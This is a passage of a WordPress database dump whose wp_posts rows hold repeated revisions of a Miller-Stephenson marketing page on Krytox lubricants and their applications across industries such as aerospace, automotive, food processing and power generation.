temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n[ux_product_categories ids="40,171,96,97" number="10"]\n\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n[ux_product_categories ids="46,96" number="10"]\n\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 14:07:03', '2016-09-29 14:07:03', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2144, 2, '2016-09-29 14:13:47', '2016-09-29 14:13:47', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 14:13:47', '2016-09-29 14:13:47', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2145, 20, '2016-09-29 14:17:16', '2016-09-29 14:17:16', '', '', '', 'publish', 'closed', 'closed', '', '2145', '', '', '2016-09-29 14:17:16', '2016-09-29 14:17:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/2145/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2146, 0, '2016-09-29 14:22:46', '2016-09-29 14:22:46', '', '', '', 'publish', 'closed', 'closed', '', '2146', '', '', '2016-09-29 14:22:46', '2016-09-29 14:22:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2146/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2147, 20, '2016-09-29 14:23:52', '2016-09-29 14:23:52', '', '', '', 'publish', 'closed', 'closed', '', '2147', '', '', '2016-09-29 14:23:52', '2016-09-29 14:23:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/2147/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2148, 2, '2016-09-29 14:32:06', '2016-09-29 14:32:06', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the 